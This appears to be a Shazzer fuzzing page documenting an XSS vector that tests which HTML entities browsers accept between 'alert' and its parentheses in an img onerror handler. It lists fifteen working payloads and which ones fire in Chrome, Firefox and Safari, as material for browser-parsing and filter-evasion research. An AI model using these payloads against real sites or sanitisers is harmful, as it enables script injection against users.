Entities allowed between function calls

This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: 6/29/2024, 1:55:26 PM

Updated on: 7/14/2024, 11:55:35 PM

Vector type: XSS

Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="alert&ThinSpace;('&#38;ThinSpace;')">
<img src=data: onerror="alert&puncsp;('&#38;puncsp;')">
<img src=data: onerror="alert&MediumSpace;('&#38;MediumSpace;')">
<img src=data: onerror="alert&thinsp;('&#38;thinsp;')">
<img src=data: onerror="alert&hairsp;('&#38;hairsp;')">
<img src=data: onerror="alert&emsp;('&#38;emsp;')">
<img src=data: onerror="alert&NonBreakingSpace;('&#38;NonBreakingSpace;')">
<img src=data: onerror="alert&NewLine;('&#38;NewLine;')">
<img src=data: onerror="alert&emsp13;('&#38;emsp13;')">
<img src=data: onerror="alert&emsp14;('&#38;emsp14;')">
<img src=data: onerror="alert&ensp;('&#38;ensp;')">
<img src=data: onerror="alert&Tab;('&#38;Tab;')">
<img src=data: onerror="alert&nbsp;('&#38;nbsp;')">
<img src=data: onerror="alert&numsp;('&#38;numsp;')">
<img src=data: onerror="alert&VeryThinSpace;('&#38;VeryThinSpace;')">

Fuzz results

Chrome logo
Chrome 126.0.0.0 desktop macOS 10.15.7
Found 8 results
Data
&emsp;
Data
&hairsp;
Data
&MediumSpace;
Data
&NewLine;
Data
&NonBreakingSpace;
Data
&puncsp;
Data
&thinsp;
Data
&ThinSpace;
Firefox logo
Firefox 127.0 desktop macOS 10.15
Found 4 results
Data
&emsp;
Data
&emsp13;
Data
&emsp14;
Data
&ensp;
Safari logo
Safari 17.4 desktop macOS 10.15.7
Found 2 results
Data
&emsp;
Data
&Tab;
Safari logo
Safari 17.5 mobile iOS 17.5.1
Found 6 results
Data
&emsp14;
Data
&ensp;
Data
&nbsp;
Data
&numsp;
Data
&Tab;
Data
&VeryThinSpace;